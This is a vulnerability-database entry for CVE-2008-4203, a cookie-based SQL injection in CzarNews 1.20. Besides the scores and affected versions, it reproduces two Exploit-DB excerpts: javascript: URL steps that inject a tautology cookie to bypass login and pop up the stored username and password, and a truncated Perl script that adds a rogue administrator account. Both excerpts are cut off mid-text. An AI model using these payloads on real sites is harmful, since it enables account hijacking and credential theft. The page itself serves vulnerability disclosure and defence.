CVE-2008-4203
Published 2008-09-24
CVE-2008-4203: SQL injection vulnerability in cn_users.php in CzarNews 1.20 and earlier allows remote attackers to execute arbitrary SQL commands via a recook cookie.
Priority P3 · 47 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.01% (78.4th percentile)
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| czaries | czarnews | <= 1.20 | — |
| czaries | czarnews | — | — |
| czaries | czarnews | — | — |
| czaries | czarnews | — | — |
No detection rules found.
Exploit-DB
CzarNews 1.20 - Account Hijacking SQL Injection
exploitdb·2008-09-15
---
czarNews Account Hijacking <= 1.20 user and password Leak
Author: Maycon Maia Vitali ( 0ut0fBound )
Contact: mayconmaia at yahoo dot com dot br
http://maycon.gsec.com.br
Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 )
General Xploit:
1) Go to some page with CzarNews 1.20. You are in the 'Login Page'
2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or
''='";void(0);
3) Refresh the page. Now you are logged in.
4) Put in the URL:
javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a
lert("Login: " + p[0] + "\nPass: " + p[1]);void(0);
5) With this you got the current user and password
Attacking Specific User:
If you have some user that you need Xploit, You can change the
Exploit-DB
CzarNews 1.20 - 'cookie' SQL Injection
exploitdb·2008-09-15
---
#!/usr/bin/perl
# ----------------------------------------------------------
# CzarNews agent("Mozilla/4.5 [en] (Win95; U)");
$http_s->timeout(1);
$http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1");
$request = $http_s->post($hostname."/cn_users.php",
[
user => $username,
pass => $password,
email => $email,
allcats => "all",
admin => "off",
news => "on",
images => "on",
users => "on",
categories => "on",
config => "on",
words => "on",
op => "add",
id => '',
go => "true",
submit => "Add+User"
]);
if($request->is_success)
{
if($request->content =~ /has been added/i)
{
print "[+] Added New Administrator: $username & $password\n";
}
else
{
print "[!] Exploit Failed!\n";
print "[!] Site Not Vulnerable\n";
}
}
sub banner
{
print "[+]
No writeups or analysis indexed.
http://securityreason.com/securityalert/4306
http://www.securityfocus.com/bid/31182
https://exchange.xforce.ibmcloud.com/vulnerabilities/45127
https://www.exploit-db.com/exploits/6462
Published: 2008-09-24